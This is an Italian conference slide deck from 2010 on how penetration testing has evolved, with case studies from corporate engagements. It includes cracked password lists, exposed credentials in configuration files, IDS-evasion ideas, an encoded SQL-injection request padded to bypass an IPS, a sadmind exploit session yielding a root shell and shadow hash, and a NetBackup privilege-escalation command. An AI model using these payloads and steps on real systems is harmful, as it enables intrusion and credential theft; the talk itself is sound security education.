0wning the Business, Reloaded

1. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x
0wning the Business, Reloaded
Matteo Falsetti - mfalsetti[at]enforcer.it - fusys[at]sikurezza.org

2. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 2
Chi sono
ricercatore indipendente
da più di quindici anni
da dieci mi occupo di
penetration testing e
vulnerability assessment
testimone della nascita del
progetto sikurezza.org
non mi occupo (ancora)
delle sole logiche aziendali

3. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
sicurezza, storia e parallelismi
penetration test, più di dieci anni fa
penetration test, oggi
vulnerabilità aziendali - case history
3
Agenda

4. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 4
A young boy, with greasy blonde hair, sitting in a
dark room. The room is illuminated only by the
luminescense of the C64's 40 character screen.
Taking another long drag from his Benson and
Hedges cigarette, the weary system cracker telnets
to the next faceless ".mil" site on his hit list. "guest
-- guest", "root -- root", and "system -- manager" all
fail. No matter. He has all night... he pencils the host
off of his list, and tiredly types in the next potential
victim...
1993, Improving the Security ofYour Site by Breaking Into it

5. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 5
However, there is a far more dangerous type of
system cracker out there. One who knows the ins
and outs of the latest security auditing and cracking
tools, who can modify them for specific attacks,
and who can write his/her own programs. One
who not only reads about the latest security holes,
but also personally discovers bugs and
vulnerabilities. A deadly creature that can both
strike poisonously and hide its tracks without a
whisper or hint of a trail. The uebercracker is
here.
1993, Dan Farmer e WietseVenema

6. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
1983,Wargames
1988, Internet Worm
1990, Hacker Crackdown
6
Il documento del 1993 riflette una realtà ormai
evidente, ma le tecniche descritte sono
ancora semplicistiche; è necessario aspettare il
1995 per il paper di Mudge sugli overflow
sicurezza, storia e parallelismi (3)

7. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
1985, Morris
1989, Bellovin
1994 Takedown,‘95 Joncheray,‘96 RFC1948
2001, strani attrattori
7
la fine degli anni ’90 mostra un deciso salto
qualitativo per quanto riguarda le tecniche di
attacco e difesa, le pubblicazioni indipendenti,
i tool e gli exploit...
sicurezza, storia e parallelismi (4)

8. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
10 - 12 anni per un uso mainstream dei b0f
15 anni perchè compaiano le prime metodiche
di protezione sistematica
10 anni per le prime prese di posizione contro la
generazione debole degli ISN
20 anni per mitigare (non risolvere) il
problema del tcp spoofing
8
sicurezza, storia e parallelismi (5)

9. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 9
sicurezza, storia e parallelismi (6)
incidente / paper
torpore
patch / nuovi trend / nuovi incidenti
Vi ricorda qualcosa?

10. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 10
scoperta
rilascio patch
annuncio
installazione patch
sicurezza, storia e parallelismi (6)

11. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
infrastrutture perimetrali(?!) semplici
poche e note implementazioni dei demoni
pochi paper, meno tool, praticamente
nessuna comunità professionale online
compromissione dei sistemi con i soliti
metodi
11
penetration test, più di dieci anni fa

12. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
password guessing
passwd theft
NSF/NIS/Telnet/FTP
world wide web? gopher e veronica, grazie
in poco tempo l’avvento dei Windows in
rete darà il via alle danze SMB/CIFS
1997, su Phrack #51 fyodor presenta
nmap
12
penetration test, più di dieci anni fa (2)

13. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
no canvas, no core impact, no metasploit,
no... praticamente niente ;-p
exploit importantissimi, differenza tra
PT con e senza risultati concreti
quasi totale assenza di skill specifici per i
sistemi Win32
la kb personale del tester fa la differenza
1998, nasce nessus
13
penetration test, più di dieci anni fa (3)

14. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
gli 0-day sono rari
gli 0-day sono privati (fino a un certo
punto)
gli 0-day sono preziosissimi
anche gli exploit noti sono rari, soprattutto
se
multi-piattaforma, multi-architettura,
multi-target
funzionanti :-p
14
penetration test, più dieci anni fa (4)

15. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 15
penetration test, più di dieci anni fa (5)
password exploit
NFS/NIS Altro

16. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
the network is the computer? no, the web
http e xml il nuovo esperanto
tutto è un’applicazione web
16
penetration test, oggi

17. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
deployment in cluster distribuiti
complessi scenari perimetrali
virtualizzazioni e cloud computing
eterogeneità dei client
17
penetration test, oggi (2)

18. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
non esistono più exploit pesanti
iis, apache, ssh?
“a remote in ssh is a dead dream” (anonimo)
se esistessero non sarebbero venduti ai soliti
noti commerciali (o si?!)
18
penetration test, oggi (3)

19. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
oggi gli exploit servono meno (con le dovute
eccezioni)
strumenti come metasploit facilitano
enormemente la creazione di codice di
attacco
i pt richiedono altro
sicurezza fisica
logiche client-side
conoscenza dell’ambiente bersaglio, delle
infrastrutture, delle tecnologie
19
penetration test, oggi (4)

20. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
spesso i pt sono
sotto-stimati
(“meglio un assessment classico”)
non compresi
(“fate quel che dovete, ma non toccate nulla, non copiate o
modificate alcun dato, non impersonate utenze altrui, non
aumentate il carico della macchina, non...”)
menomati da logiche aziendali estranee
(“ok i sistemi A, C e D. Il B no, perchè fa parte della linea di
esercizio e sistemi, che fa capo a X. I sistemi da E a H non li
testiamo perchè non siamo riusciti a contattare il referente
internoY.”)
20
penetration test, oggi (5)

21. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
spesso i pt sono
sotto-stimati
(“meglio un assessment classico”)
non compresi
(“fate quel che dovete, ma non toccate nulla, non copiate o
modificate alcun dato, non impersonate utenze altrui, non
aumentate il carico della macchina, non...”)
menomati da logiche aziendali estranee
(“ok i sistemi A, C e D. Il B no, perchè fa parte della linea di
esercizio e sistemi, che fa capo a X. I sistemi da E a H non li
testiamo perchè non siamo riusciti a contattare il referente
internoY.”)
21
penetration test, oggi (5)

22. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 22
vulnerabilità aziendali - case history
vulnerabilità semplici
errori di configurazione
errori logici, di design
disattenzioni, dimenticanze
spesso più efficaci di qualunque exploit
il problema è umano (tanto più vero al
crescere dell’azienda, delle policy, delle linee
gerarchiche, degli screzi tra quadri/dirigenti, ...)

23. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 23
vulnerabilità aziendali - case history
Totti
multi-user e single-user, per me pari sono
appliance a 6 zeri
chained exploit, lotek edition

24. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 24
vulnerabilità aziendali - case history
Totti

25. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 25
vulnerabilità aziendali - case history
Totti
wmilan abc123 totti
marco9 alice1 pippo321
gandalf slamdunk Amore71
password mare19 GretA
fragolin Andrea63 mundogol
R0m4n0 capitan0 Madonna
C0ns0l3 redwine lucillA
sesso69 OKpassw wlafranc
scout441 pooh123 falcao82
rospomo Gelato!! malta99
testtest abcabc19 amendola
Adolfo65 cambiami TmP1234

26. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 26
vulnerabilità aziendali - case history
10 anni di password
dizionario
forza bruta 3gg
non ottenute
forza bruta 3gg

27. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
in media il 5% - 10% delle utenze
presenta la password uguale (o simile) allo
username
tutte le aziende hanno una policy per le
password, poche policy sono accettate dai
dipendenti, pochissime sono sicure
27
vulnerabilità aziendali - case history
Totti

28. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 28
vulnerabilità aziendali - case history
Totti
in media il 5% - 10% delle utenze
presenta la password uguale (o simile) allo
username
tutte le aziende hanno una policy per le
password, poche policy sono accettate dai
dipendenti, pochissime sono sicure

29. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
teoricamente un sistema in produzione è
più pulito e controllato dell’ambiente di
deployment
nella pratica, spesso non esistono repliche
di collaudo e gli sviluppatori lavorano
direttamente negli ambienti di produzione
29
vulnerabilità aziendali - case history
multi-user e single-user, per me pari sono

30. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
anni di sistemi casalinghi mono-utente
hanno creato una generazione di single-
user noncuranti dei privilegi del file-system
credenziali e/o informazioni sensibili nei file
batch di prova
file leggibili da chiunque
nessuna separazione dei privilegi
30
vulnerabilità aziendali - case history
multi-user e single-user, per me pari sono

31. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 31
nagios: /opt/bea/wls93jdk/domains/XYZ/DEPLOYMENT>
[Server]
Hostname=srv_VIP_bldn7.xyz.org
ip=www.xxx.yyy.zzz
[Domain]
env=prod
domain=XYZ
suff_instance=wls
range_instance=01,02,03,admin
range_port=7001,7022,7003,9001
[Credential]
username=system
password=bmX@Bea_aDmin
more init.cfg

32. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
(falsema) /opt/home/oracle/DBA/PROD_SRV >
create public database link PPL_PROD.ACME.ORG
connect to PPL_RO identified by aqw23nm45 using 'PPL_PROD';
more cr_public_db.sql
(falsema) /opt/home/oracle/DBA/PROD_SRV/PPL >
arch:identified by ACME06AQUA
arch: IDENTIFIED BY "ppl_ro" DEFAULT TABLESPACE "OPSPPL"
arch: IDENTIFIED BY "ACME2006P" DEFAULT TABLESPACE "USERZ"
cr_db_link.sql: identified by ACME06AQUA
cr_role_ppl_ro.sql: IDENTIFIED BY "ppl_ro" DEFAULT TABLESPACE
"OPSPPL"
cr_user_ppl_ro.sql: IDENTIFIED BY "IRP2006P" DEFAULT TABLESPACE
"USERZ"
grep identified *
32

33. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti
ACME-NET-Guest
dlink
PseudoRandomSSIDGenerator
shelab
Free Public WiFi
Squeeze 2
acmeMYnet
Wannabe_7941
demo Billy
Agere Systems
HFG11
hpsetup
Pronto_Network_1
LDPY
beverlac419
CX2000
Mario Rossi's Network
wicked
b2
rmc_ap
PGNetwork
test02MacLeod
Tonino's Home WLAN
A97-MMCS03
COMPAQ
WIRELESS
ESP7
BMX
Forest
AKU2TT-LINK
YES78
33
vulnerabilità aziendali - case history

34. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 34
vulnerabilità aziendali - case history
FW/IDS applicativo
grande azienda
progetto da 1 milione di EUR per la
protezione e l’archiviazione delle operazioni
di n database critici
stringenti policy per AAA verso l’appliance e i
db
policy password
policy accesso
appliance a 6 zeri

35. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 35
vulnerabilità aziendali - case history
appliance a 6 zeri
due differenti modalità operative
attiva (inspect & forward)
passiva (sniffer/IDS)
logging esteso del traffico SQL
elevato throughput

36. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 36
vulnerabilità aziendali - case history
appliance a 6 zeri
due differenti modalità operative
attiva (inspect & forward)
passiva (sniffer/IDS)
logging esteso del traffico SQL
elevato throughput
questo dipende da una precisa scelta operata
dagli sviluppatori dell’appliance in termini di
capacità di sniffing dei datagrammi

37. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 37
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
SQL
SELECT
SYSDATE FROM
DUAL

38. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 38
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
SQL
SELECT
SYSDATE FROM
DUAL

39. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 39
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
SQL
DROP TABLE
XYZ

40. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 40
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
SQL
DROP TABLE
XYZ

41. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 41
vulnerabilità aziendali - case history
appliance a 6 zeri
IP FragmentTCP FragmentSQL
DROP TABLE
XYZ
IP Fragmentation

42. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 42
vulnerabilità aziendali - case history
appliance a 6 zeri
D R O P
X Y
T
Z
A B L E
TCP Splicing

43. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 43
vulnerabilità aziendali - case history
appliance a 6 zeri
Tecnica 0-day?! Non esattamente.

44. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 44
appliance a 6 zeri
vulnerabilità aziendali - case history
IPS applicativo
grande azienda
tutte le applicazioni web sono protette
dall’appliance
three tier architecture

45. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 45
appliance a 6 zeri
vulnerabilità aziendali - case history
web application assessment
XSS e SQL Injection praticamente impossibili
l’IPS filtra e/o blocca ogni input malevolo
logga ogni transazione identificata

46. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 46
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
HTTP
GET /brandprofile/vulnus.aspx?xyz=XYZ
%27%3B%20CREATE%20TABL%20sqlmapoutput
(data%20varchar(8000))%3B--%20AND%20%
27PLyKB%27=%27PLyKB
HTTP/1.1

47. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 47
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
HTTP
GET /brandprofile/vulnus.aspx?xyz=XYZ
%27%3B%20CREATE%20TABL%20sqlmapoutput
(data%20varchar(8000))%3B--%20AND%20%
27PLyKB%27=%27PLyKB
HTTP/1.1

48. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 48
vulnerabilità aziendali - case history
appliance a 6 zeri
IP
TCP
HTTP
GET /brandprofile/vulnus.aspx?foo=aaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&xyz=XYZ%27%3B%
20CREATE%20 TABLE%20sqlmapoutput%28data%20varchar%
288000%29%29%3B--%20AND%20%27PLyKB%27=%27P LyKB
HTTP/1.1

49. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 49
vulnerabilità aziendali - case history
chained exploit, lotek edition
dominio Windows
DC1 e DC2, AD1 e AD2, 150 PDL
patch level da manuale
credenziali complesse e lock-out degli account

50. Postazioni di Lavoro
Sala Server
Veritas Netbackup

51. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 51
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password
Guessing
SADMIND
Exploit
Srv Enable

52. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 52
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password
Guessing
SADMIND
Exploit
Srv Enable
docfuz@giringiro $
holygrail2 vs. SunOS 5.9 sadmind
by kcope in 2008
binds a shell to port 5555
perl ~/xpl/sadmind.pl w.x.y.z
docfuz@giringiro $ nc w.x.y.z 5555
id
uid=0(root) gid=0(root)
grep root /etc/shadow
root:mfK7894OhtMoO:12458::::::

53. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 53
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password
Guessing
SADMIND
Exploit
Local
Privilege
Escalation
Srv Enable
echo “falsema ADMIN=ALL JBP=ALL” >> /nbudb/openv/java/auth.conf

54. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 54
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password
Guessing
SADMIND
Exploit
Local
Privilege
Escalation
Srv Enable
Netbackup
Administration

55. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 55
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password
Guessing
SADMIND
Exploit
Local
Privilege
Escalation
Srv Enable
Netbackup
Administration

56. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 56
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password
Guessing
SADMIND
Exploit
Local
Privilege
Escalation
Srv Enable
Netbackup
Administration
Software
Leech
Windows 2003 server R2 32bit edition
Netbackup 5.1 install + patch
Win2003
VM
AD
half restore

57. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 57
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password
Guessing
SADMIND
Exploit
Local
Privilege
Escalation
Srv Enable
Netbackup
Administration
Software
Leech
Win2003
VM
AD
half restore
restore del server AD di backup
reinstallazione driver
installazione servizio nel registro
creazione di utenza di dominio

58. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 58
vulnerabilità aziendali - case history
!
0wned Domain
chained exploit, lotek edition
Password
Guessing
SADMIND
Exploit
Local
Privilege
Escalation
Srv Enable
Netbackup
Administration
Software
Leech
Win2003
VM
AD
half restore
AD
corruption

59. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 59
vulnerabilità aziendali - considerazioni
misconfiguration / hardening
logica client side
web input validation
buffer overflow
10 anni fa oggi

60. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 60
vulnerabilità aziendali - considerazioni
pt esterno
applicazioni web
proprietarie (circa 4 su 5)
configurazioni errate
password
niente più NFS/NIS/FTP/SMB/CIFS

61. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 61
vulnerabilità aziendali - considerazioni
pt esterno
applicazioni web
proprietarie (circa 4 su 5)
configurazioni errate
password
niente più NFS/NIS/FTP/SMB/CIFS
pt interno
password
problemi derivanti dalla gestione logica
delle risorse IT
eterogeneità architetture / piattaforme
complessità gestione policy
differenti organigrammi, differenti
responsabilità

62. x89xfbx6ax02x
x6ax3fx58xcdx
x49x79xf8x6ax
x58x99x52x68
x2fx73x68x68x0wning the Business, Reloaded - SMAU2010 - Milano, 22 Ottobre 2010 - Matteo Falsetti 62
0wning the Business,Reloaded
Matteo Falsetti - mfalsetti[at]enforcer.it - fusys[at]sikurezza.org
le immagini del fumetto Dilbert e del progetto Metasploit sono di proprietà dei rispettivi autori
Domande?